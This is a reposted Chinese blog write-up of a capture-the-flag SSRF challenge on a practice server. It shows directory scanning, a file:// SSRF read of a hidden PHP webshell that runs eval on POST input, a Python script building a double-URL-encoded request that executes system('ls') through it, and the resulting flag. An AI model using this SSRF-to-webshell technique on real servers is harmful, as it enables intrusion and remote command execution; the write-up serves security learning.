记一次简单的PHP代码审计(SSRF案例)

最新推荐文章于 2024-07-30 21:02:40 发布
最新推荐文章于 2024-07-30 21:02:40 发布
阅读量595 收藏
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/yang12318/p/9442401.html
版权

题目链接:

http://oj.momomoxiaoxi.com:9090/

用dirsearch对网址进行扫描,发现robots.txt

命令行:

python3 dirsearch.py -u "http://oj.momomoxiaoxi.com:9090/" -e *

 

于是输入网址打开这个文件:

http://oj.momomoxiaoxi.com:9090/robots.txt

得到以下页面:

发现了隐藏的页面,输入以下网址得到源代码:

http://oj.momomoxiaoxi.com:9090/index.php?url=file:///var/www/html/webshe11111111.php

将代码复制下来在本地新建一个PHP文件:

 1 <?php
 2 
 3 $serverList = array(
 4     "127.0.0.1"
 5 );
 6 $ip = $_SERVER['REMOTE_ADDR'];
 7 foreach ($serverList as $host) {
 8     if ($ip === $host) {
 9         if ((!empty($_POST['admin'])) and $_POST['admin'] === 'h1admin') {
10             @eval($_POST['hacker']);
11         } else {
12             die("You aren't admin!");
13         }
14     } else {
15         die('This is webshell');
16     }
17 }

将其运行,得到如下页面:

按F12后点击HackBar插件,将进行如下修改:

即在本地搭建了一个环境,满足了源码中的host,然后发送POST请求,进行抓包,得到如下界面:

 

将其POST内容进行修改后写进脚本中:

 1 exp='''\
 2 POST /webshe11111111.php HTTP/1.1
 3 Host:127.0.0.1
 4 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
 5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 6 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
 7 Accept-Encoding: gzip, deflate
 8 Referer: http://localhost:63342/php/webshe11111111.php
 9 Content-Type: application/x-www-form-urlencoded
10 Content-Length: 34
11 Cookie: Phpstorm-c2b818=be05b847-c935-441b-bdb7-465508c336b0
12 Connection: close
13 Upgrade-Insecure-Requests: 1
14 
15 admin=h1admin&hacker=system('ls');
16 '''
17 import urllib
18 tmp = urllib.quote(exp)
19 new = tmp.replace("%0A","%0D%0A")
20 result = "_"+urllib.quote(new)
21 print result

运行后得到字符串:

_POST%2520/webshe11111111.php%2520HTTP/1.1%250D%250AHost%253A127.0.0.1%250D%250AUser-Agent%253A%2520Mozilla/5.0%2520%2528Windows%2520NT%252010.0%253B%2520Win64%253B%2520x64%253B%2520rv%253A61.0%2529%2520Gecko/20100101%2520Firefox/61.0%250D%250AAccept%253A%2520text/html%252Capplication/xhtml%252Bxml%252Capplication/xml%253Bq%253D0.9%252C%252A/%252A%253Bq%253D0.8%250D%250AAccept-Language%253A%2520zh-CN%252Czh%253Bq%253D0.8%252Czh-TW%253Bq%253D0.7%252Czh-HK%253Bq%253D0.5%252Cen-US%253Bq%253D0.3%252Cen%253Bq%253D0.2%250D%250AAccept-Encoding%253A%2520gzip%252C%2520deflate%250D%250AReferer%253A%2520http%253A//localhost%253A63342/php/webshe11111111.php%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AContent-Length%253A%252034%250D%250ACookie%253A%2520Phpstorm-c2b818%253Dbe05b847-c935-441b-bdb7-465508c336b0%250D%250AConnection%253A%2520close%250D%250AUpgrade-Insecure-Requests%253A%25201%250D%250A%250D%250Aadmin%253Dh1admin%2526hacker%253Dsystem%2528%2527ls%2527%2529%253B%250D%250A

复制到链接中得到存放flag的页面:

用得到webshell的方式则可得到fl11111aaaaaggggg.php的页面:

点开之后是一片空白,先想到查看源代码,得到flag:

Flag{Th1s_Easy_SSRF}

转载于:https://www.cnblogs.com/yang12318/p/9442401.html

weixin_30587927
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
一次代码审计实战案例【思路流程】
HBohan的博客
03-03 933
此次代码审计使用了通用代码审计思路的两种,第一种:根据功能点定向审计、第二种:敏感函数回溯参数过程,没有用到的是通读全文代码。活用 phpstorm 可以让代码审计的效率大大增加。
PHP代码审计入门指南1
08-04
PHP代码审计入门指南1】是一本针对初学者的PHP代码审计教程,旨在帮助读者理解和掌握PHP代码审计的基础知识和技巧。本指南不仅涵盖了代码审计的要点,还讲解了漏洞产生的原理和防御方法,旨在提升读者对Web安全的...
1000个php代码审计案例,一次简单PHP代码审计SSRF案例
weixin_34847560的博客
03-19 319
题目链接:用dirsearch对网址进行扫描,发现robots.txt命令行:python3 dirsearch.py -u "http://oj.momomoxiaoxi.com:9090/" -e * 于是输入网址打开这个文件:http://oj.momomoxiaoxi.com:9090/robots.txt得到以下页面: 发现了隐藏的页面,输入以下网址得到源代码:http://oj.mom...
2024年最新[NISACTF 2024]easyssrf wp(SSRF入门),大厂直通车
2401_84265571的博客
05-06 539
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
php代码审计靶场,一次简单php代码审计
weixin_36326528的博客
03-16 418
PHP代码审计所需工具:(1)环境:PHPstudy我这里直接使用phpstudy。其他的如:xampp,lamp等集成环境都可以。Phpsyudy官网地址:https://www.xp.cn(2)代码审计工具:“工欲善其事,必先利其器。”一款好的代码审计工具可以辅助我们的白盒测试,提高挖掘漏洞的效率。下面我来介绍一下两款常用的代码审计工具。1.RIPSRips是PHP语言开发的一款流行的审...
怎么学php代码审计,一次简单php代码审计
weixin_31830389的博客
03-09 198
PHP代码审计所需工具:(1) 环境:PHPstudy我这里直接使用phpstudy。其他的如:xampp,lamp等集成环境都可以。Phpsyudy官网地址:https://www.xp.cn(2)代码审计工具:“工欲善其事,必先利其器。”一款好的代码审计工具可以辅助我们的白盒测试,提高挖掘漏洞的效率。下面我来介绍一下两款常用的代码审计工具。1. RIPSRips是PHP语言开发的一款流行的审计...
代码审计——SSRF详解
Boom!脑洞大爆炸的博客
06-17 1439
代码审计SSRF详解
PHP代码审计基础知识
热门推荐
网络安全
04-07 7万+
本文章主要是PHP代码审计的一些基础知识,包括函数的用法,漏洞点,偏向基础部分,个人能力有限,部分可能会出现错误或者遗漏,读者可自行补充。 代码执行# 代码执行是代码审计当中较为严重的漏洞,主要是一些命令执行函数的不适当使用。那么,常见的能够触发这类漏洞的函数有哪些呢? eval()# 想必大家对eval()函数应该并不陌生,简而言之eval()函数就是将传入的字符串当作 PHP 代码来进行执行。 eval( string $code) : mixed 返回值# eval() 返回 NULL,除非在
java之SSRF代码审计
weixin_45653478的博客
06-24 564
HttpURLConnection 是 URLConnection 的子类, 用来实现基于 HTTP URL 的请求、响应功能,每个 HttpURLConnection 实例都可用于生成单个网络请求,支持GET、POST、PUT、DELETE等方式。在调用 URL.openConnection() 获取 URLConnection 实例的时候,真实的网络连接实 际上并没有建立,只有在调用 URLConnection.connect() 方法后才会建立连接。//htmlContent添加到html里面。
[ 代码审计篇 ] 代码审计思路 详解
qq_51577576的博客
12-17 1万+
代码审计是网络安全技术工作的重要内容,是安全岗位必备技能。 渗透测试岗几乎都会问道代码审计,这篇文章就来聊一聊代码审计的思路。 这篇文章就来聊一聊什么是代码审计,什么是静态测试 ? 重点部分:代码审计工具介绍,代码审计的思路介绍。 不要觉得代码审计很容易,也不要觉得代码审计很难,重在坚持,重在分析。 文中出现的细节在后续中都会有详细解读!!!
PHP代码审计
2301_76786857的博客
03-11 1179
本文章主要是PHP代码审计的一些基础知识,包括函数的用法,漏洞点,偏向基础部分,个人能力有限,部分可能会出现错误或者遗漏,读者可自行补充。看完这里不知道你对代码审计中的代码执行部分是否有另一种想法?我的想法就是这个是和后门联系在一起的。我们可以看到很多函数都具有构造执行命令的条件,而且其中很多函数也的确被用在后门中,特别像后面几个回调函数,在后门中更是常见。当然这些后门函数也早已被安全厂商盯住,所以大部分已经无法直接免杀,所以想要免杀就需要结合其他姿势,比如替换、拼接、加密等等。
PHP代码审计小结1
08-03
在进行PHP代码审计时,还需要关注其他安全问题,如XSS跨站脚本、SQL注入、CSRF跨站请求伪造、SSRF服务器端请求伪造等,以及第三方组件的安全性。通过综合运用上述方法,可以有效地提升Web应用程序的安全性。
[ 代码审计 ] 通达OA审计文档.pdf
02-11
代码审计是软件开发中不可或缺的一部分,对于软件的安全性和可靠性具有重要的影响。因此,我们需要对代码进行细致的审计和测试,以避免漏洞的出现和利用。 在实际的代码审计中,我们可以使用多种工具和技术,包括...
第一节 SSRF原理介绍-01
09-15
SSRF(Server-Side Request Forgery,服务端请求伪造)是一种构造请求,由服务端发起请求的安全漏洞。客户端服务端内网资源一般情况下,SSRF的目标就是与外部隔离的内网资源。 SSRF漏洞定义: SSRF漏洞定义是指...
SSRF_Vulnerable_Lab:本实验包含易受服务器端请求伪造攻击的示例代码
05-12
服务器端请求伪造(SSRF)易受攻击的实验室该存储库包含容易受到服务器端请求伪造(SSRF)攻击PHP代码。 我想对@ albinowax,AKReddy,Vivek Sir(感谢一直以来支持我的杰出人物),Andrew Sir-@vanderaj(感谢他的...
RCE和php文件上传
最新发布
m0_71332744的博客
07-30 713
在网络安全领域,远程命令执行(RCE)和文件上传漏洞是两种常见的攻击方式。本文将带大家深入了解这两种漏洞的原理、利用方法以及如何进行有效防御。
53、PHP 实现归并排序
weixin_44010641的博客
07-30 243
【代码】53、PHP 实现归并排序。
WordPress原创插件:搜索引擎抓取首图seo图片
爱酷码的博客
07-29 377
WordPress原创插件:搜索引擎抓取首图seo图片。
"PHP代码审计入门指南:实例教程与常见漏洞防范技巧
这本《PHP代码审计入门指南》是一本涵盖了学习PHP代码审计过程中整理出的一些技巧和对漏洞的一些理解的指南。在本指南中,将介绍PHP审计的基础知识、工具准备、常用快捷键、审计思路、用户可控输入速查表、敏感函数...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值